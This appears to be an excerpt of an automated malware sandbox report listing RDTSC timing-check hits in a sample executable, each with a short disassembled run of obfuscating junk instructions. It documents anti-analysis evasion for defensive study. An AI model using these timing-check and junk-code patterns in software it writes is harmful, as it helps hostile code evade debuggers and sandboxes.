                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 74DE5F second address: 74DE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7290766B26h 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F7290766B26h 0x00000012 jmp 00007F7290766B33h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7526BC second address: 7526C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7526C0 second address: 7526C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7527FC second address: 75282E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7290C62CB6h 0x0000000c jmp 00007F7290C62CB5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 753372 second address: 753389 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7290766B26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push ebx 0x0000000f jl 00007F7290766B26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 753389 second address: 753391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 753391 second address: 75339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75339C second address: 7533A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 753522 second address: 753526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 753526 second address: 75352C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75352C second address: 753566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290766B36h 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007F7290766B2Eh 0x00000012 jmp 00007F7290766B2Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7522A0 second address: 7522AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75B90F second address: 75B92F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B31h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c js 00007F7290766B2Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75B92F second address: 75B93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75B93B second address: 75B93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75B93F second address: 75B951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F7290C62CA6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75B951 second address: 75B957 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75B957 second address: 75B95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75BACE second address: 75BB0A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7290766B37h 0x00000008 jmp 00007F7290766B33h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F7290766B26h 0x00000016 jng 00007F7290766B26h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75BC75 second address: 75BC86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007F7290C62CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75BF01 second address: 75BF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7290766B32h 0x0000000b jbe 00007F7290766B26h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75BF1F second address: 75BF2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F7290C62CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75C3B3 second address: 75C3BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75C520 second address: 75C538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7290C62CB0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75C675 second address: 75C679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75C942 second address: 75C99F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB5h 0x00000007 jc 00007F7290C62CA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F7290C62CB9h 0x00000015 jmp 00007F7290C62CB9h 0x0000001a pop edi 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop edx 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75C99F second address: 75C9BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 764E35 second address: 764E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 712716 second address: 71271A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 712DA8 second address: 712E1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F7290C62CB9h 0x00000010 jmp 00007F7290C62CB3h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push edi 0x0000001b jnl 00007F7290C62CA6h 0x00000021 pop edi 0x00000022 pushad 0x00000023 jmp 00007F7290C62CB5h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e jmp 00007F7290C62CB2h 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 pushad 0x00000038 push edx 0x00000039 push esi 0x0000003a pop esi 0x0000003b pop edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 712EF1 second address: 712EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 712EF7 second address: 712F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F7290C62CABh 0x00000011 jno 00007F7290C62CA6h 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7132C2 second address: 7132D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7290766B26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7132D1 second address: 713316 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e movsx edx, cx 0x00000011 push 00000004h 0x00000013 mov dword ptr [ebp+150D228Dh], eax 0x00000019 pushad 0x0000001a add dword ptr [ebp+150D24C1h], ebx 0x00000020 jmp 00007F7290C62CB4h 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F7290C62CADh 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713316 second address: 713321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F7290766B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713746 second address: 71374A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713AD7 second address: 713B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F7290766B3Ah 0x00000010 nop 0x00000011 mov edx, dword ptr [ebp+150D291Eh] 0x00000017 or dx, AFC1h 0x0000001c lea eax, dword ptr [ebp+15280494h] 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F7290766B28h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov edx, dword ptr [ebp+150D271Fh] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 je 00007F7290766B26h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 764037 second address: 764051 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290C62CA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jo 00007F7290C62CA6h 0x00000013 jc 00007F7290C62CA6h 0x00000019 pop ebx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76488D second address: 764894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 764894 second address: 7648AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290C62CB3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7648AB second address: 7648BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F7290766B26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F7290766B26h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 769D51 second address: 769D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F7290C62CACh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7290C62CB7h 0x00000012 jmp 00007F7290C62CACh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 769F1C second address: 769F27 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76B799 second address: 76B79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6D5885 second address: 6D5889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6D5889 second address: 6D58CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F7290C62CAEh 0x0000000c pop edi 0x0000000d push edi 0x0000000e jmp 00007F7290C62CB8h 0x00000013 pop edi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7290C62CB1h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F30B second address: 76F315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F315 second address: 76F327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F327 second address: 76F32B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F32B second address: 76F34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CAFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F7290C62CAAh 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F5F3 second address: 76F60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7290766B2Ah 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F60C second address: 76F610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F77C second address: 76F7B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290766B26h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F7290766B2Dh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a jc 00007F7290766B26h 0x00000020 pushad 0x00000021 popad 0x00000022 jl 00007F7290766B26h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jg 00007F7290766B26h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76FC42 second address: 76FC53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F7290C62CAAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7757B5 second address: 775805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F7290766B2Ch 0x00000012 jc 00007F7290766B26h 0x00000018 jmp 00007F7290766B30h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7290766B2Dh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 775805 second address: 77580B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77580B second address: 775811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 775811 second address: 775816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 775816 second address: 77581C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C7FCF second address: 6C7FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F7290C62CA6h 0x0000000c je 00007F7290C62CA6h 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C7FE9 second address: 6C7FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7290766B26h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C7FF4 second address: 6C8021 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jns 00007F7290C62CBEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C8021 second address: 6C8025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77417E second address: 774182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774182 second address: 774188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7742CD second address: 774324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB8h 0x00000007 jns 00007F7290C62CA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007F7290C62CB7h 0x00000015 jmp 00007F7290C62CB9h 0x0000001a pop esi 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774324 second address: 77432A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774475 second address: 77447B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77447B second address: 774481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774481 second address: 774486 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774486 second address: 77448C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77448C second address: 7744C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F7290C62CE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7290C62CB6h 0x00000018 jmp 00007F7290C62CB0h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7744C5 second address: 7744D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77460F second address: 774615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774615 second address: 77462B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B32h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77462B second address: 774635 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774635 second address: 77463B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77463B second address: 77463F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77463F second address: 77464E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7134BF second address: 71355F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7290C62CA6h 0x0000000a popad 0x0000000b jns 00007F7290C62CB8h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov ebx, dword ptr [ebp+1528048Fh] 0x0000001b js 00007F7290C62CAAh 0x00000021 mov di, A0DFh 0x00000025 add eax, ebx 0x00000027 mov dword ptr [ebp+150D1F6Eh], ecx 0x0000002d push eax 0x0000002e push edi 0x0000002f jmp 00007F7290C62CACh 0x00000034 pop edi 0x00000035 mov dword ptr [esp], eax 0x00000038 mov edx, dword ptr [ebp+150D2247h] 0x0000003e push 00000004h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F7290C62CA8h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 0000001Ah 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a cld 0x0000005b nop 0x0000005c ja 00007F7290C62CBDh 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push ebx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 71355F second address: 713564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774ABA second address: 774ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jo 00007F7290C62CA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
